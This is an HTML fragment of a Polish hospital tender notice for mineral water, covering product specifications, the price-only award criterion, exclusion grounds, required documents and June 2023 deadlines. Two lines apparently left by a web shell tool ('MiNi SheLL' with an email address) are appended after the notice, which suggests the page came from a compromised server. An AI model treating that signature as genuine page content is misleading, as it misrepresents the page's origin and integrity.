class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem Zamówienia jest artykułów żywnościowych (dalej jako Towar) dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej<br/><br/>Szczegółowy zakres parametrów i wymagań dla przedmiotu Zamówienia opisany został w formularzu asortymentowym - Szczegółowa Oferta Cenowa- załącznik 1A do SWZ - wymagania określone na podstawie art. 218 ust. 2 <br/><br/><br/>Pakiet nr 4 - Woda mineralna<br/><br/><br/>Lp.	Przedmiot zamówienia	J. m.	Ilość	Wielkość opakowania oczekiwana przez Zamawiającego (*) Szczegółowy opis przedmiotu zamówienia - wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia zgodnie z art. 246 ust. 1 Ustawy Pzp<br/>1.	2.	3.	4.	5. 6.<br/>1.	Woda mineralna, nienasycona CO2, szt.	3 500	1,5l	1 500	Woda mineralna, nienasycona CO2, zmineralizowana, jony w mg/l: wapniowy 130,30, sodowy 11,00, magnezowy 21,90, wodorowęglanowy 539,10, ogólna zawartość rozpuszczonych składników mineralnych min. 742 mg/l, opakowanie PET <br/>2.	Woda mineralna, średnionasycona CO2, szt.	6 000	1,5l	1 500	Woda mineralna, średnionasycona CO2, zmineralizowana, jony w mg/l: wapniowe 130,30, sodowe 11,00, magnezowy 21,90, wodorowęglanowy 539,10, ogólna zawartość rozpuszczonych składników mineralnych min. 742 mg/l, opakowanie PET <br/>3.	Woda mineralna, średnionasycona CO2, szt.	100	0,6l	0,6	Woda mineralna, średnionasycona CO2, wysokozmineralizowana, ogólna zawartość rozpuszczonych składników mineralnych min. 1945,05 mg/l, kationy w mg/l: wapniowe 228,60, sodowe 91,50, magnezowy 103,50, potasowy 7,50, aniony w mg/l: wodorowęglanowy 1479,90, siarczanowy 16,60, chlorkowy 17,70, fluorkowy 0,05, opakowanie PET <br/>4.	Woda mineralna, średnionasycona CO2, szt.	100	0,3l	0,3	Woda mineralna, średnionasycona CO2 od 1500 do 4000mg/l Co2, wysokozmineralizowana, ogólna zawartość rozpuszczonych składników mineralnych min. 1719, kationy w mg/l: wapniowe 168, sodowe 128, magnezowy 79, potasowy 13,aniony w mg/l: wodorowęglanowy 1267, siarczanowy 33, chlorkowy 11, fluorkowy &lt;0,40 opakowanie szklane z zakrętą<br/>5.	Woda mineralna, wysokonasycona CO2, szt.	100	0,3l	0,3	Woda mineralna, wysokonasycona CO2 powyżej 4000mg/l Co2, wysokozmineralizowana, ogólna zawartość rozpuszczonych składników mineralnych min. 1719, kationy w mg/l: wapniowe 168, sodowe 128, magnezowy 79, potasowy 13, aniony w mg/l: wodorowęglanowy 1267, siarczanowy 33, chlorkowy 11, fluorkowy &lt;0,40,opakowanie szklane z zakrętą </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> ZAMÓWIENIE Z PRAWEM OPCJI zgodnie z art. 441 Ustawy Pzp – Możliwość skorzystania z prawa opcji przez<br/>Zamawiającego opisana została w załączniku nr 3 do SWZ - projektowane postanowienia umowy w sprawie zamówienia<br/>publicznego <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium najniższej ceny, z uwagi na fakt, iż Zamawiający w opisie przedmiotu zamówienia określił wymagania jakościowe odnoszące się do co najmniej głównych elementów<br/>składających się na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W CELU POTWIERDZENIA BRAKU PODSTAW WYKLUCZENIA WYKONAWCY Z UDZIAŁU W POSTĘPOWANIU ZAMAWIAJĄCY,<br/>WEZWIE WYKONAWCĘ KTÓREGO OFERTA ZOSTAŁA NAJWYŻEJ OCENIONA DO ZŁOŻENIA W WYZNACZONYM, NIE<br/>KRÓTSZYM NIŻ 5 DNI, TERMINIE, AKTUALNYCH NA DZIEŃ ZŁOŻENIA PODMIOTOWYCH ŚRODKÓW DOWODOWYCH TJ.<br/><br/>- oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 Ustawy Pzp, o braku przynależności do tej samej grupy<br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył<br/>odrębną ofertę, do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej; Wzór przedmiotowego oświadczenia stanowi<br/>załącznik nr 2B do SWZ<br/>- odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć: <br/>1)	formularz – asortymentowy - szczegółowa oferta cenowa – sporządzony odpowiednio wg załącznika nr 1A do SWZ. – podpisany ważnym i aktualnym podpisem kwalifikowanym podpisem osobistym lub podpisem zaufanym, Formularz nie podlega uzupełnieniu, zawierający wszystkie ewentualne zmiany wprowadzone w czasie trwania postępowania. Formularz nie podlega uzupełnieniu. (Zamawiający dodatkowo zaleca ale nie wymaga dołączenie formularza w wersji edytowalnej).<br/>2)	oświadczenie wymienione w pkt. V.1) SWZ podpisane ważnym i aktualnym podpisem kwalifikowanym, podpisem osobistym lub podpisem zaufanym.<br/>3)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik; - podpisane ważnym i aktualnym podpisem kwalifikowanym, podpisem osobistym lub podpisem zaufanym.;<br/>4)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia; - podpisane ważnym i aktualnym podpisem kwalifikowanym, podpisem osobistym lub podpisem zaufanym.; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegółowe informacje zostały zawarte w V.9) SWZ - WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ O UDZIELENIE<br/>ZAMÓWIENIA <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Reguluje wzór umowy stanowiący załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy e–Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-15 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com